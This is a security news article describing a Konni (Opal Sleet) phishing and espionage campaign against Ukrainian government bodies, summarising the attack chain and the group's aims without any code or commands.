HQ/EMEAFind out how we can help your business
The North Korean state-sponsored threat group known as Konni—also referred to by aliases like Opal Sleet and TA 406—has ramped up cyber espionage efforts against Ukrainian government bodies.
These initiatives gather intelligence that could shape North Korea’s military strategy regarding the Russia-Ukraine conflict.
In February 2025, a team of threat intelligence analysts uncovered this campaign, discovering that the attackers used phishing emails masquerading as messages from fictitious think tanks.
These emails cited recent political or military events in Ukraine, such as leadership changes or electoral occurrences, to bolster their credibility and entice recipients to open harmful content.
Analysts believe this campaign is crafted to assist North Korean leaders in assessing the strength of Ukrainian resistance, the potential trajectory of the conflict, and the risks posed to North Korean personnel deployed in support of Russian forces since late 2024.
The intelligence collected may also help predict whether Russia might seek further assistance in terms of troops or weaponry.
The Konni group uses phishing tactics as its primary weapon in its attack process.
According to investigations, the Konni threat group sent phishing emails through free services like Gmail, ProtonMail, and Outlook.
Subsequently, victims were led to MEGA-hosted downloads that contained a password-protected archive file labelled Analytical Report[.]rar. Inside this archive was a compiled HTML help file (.CHM) that, when accessed, executed embedded PowerShell commands.
These commands initiated downloads of additional malicious scripts that conducted host reconnaissance and ensured persistence on infected systems.
Variants of the attack chain were noted using HTML attachments to release ZIP archives containing decoy PDF documents and harmful LNK shortcuts. These shortcuts eventually executed PowerShell and VBScript code.
While the final payload of these attacks remains unrecovered, it is suspected to be a backdoor or malware component intended for long-term espionage activities.
Analysts also identified prior reconnaissance activities linked to the same threat actor. These efforts included phishing emails that imitated Microsoft security alerts, falsely alerting targets about suspicious login attempts and directing them to a counterfeit authentication page hosted on jetmf[.]com to capture login credentials.
This campaign signifies a notable escalation in North Korea’s cyber initiatives beyond its economic and strategic espionage goals.
It also highlights the growing complexity of Ukraine’s cybersecurity issues, which have been primarily shaped by ongoing Russian cyber threats since the beginning of the war.
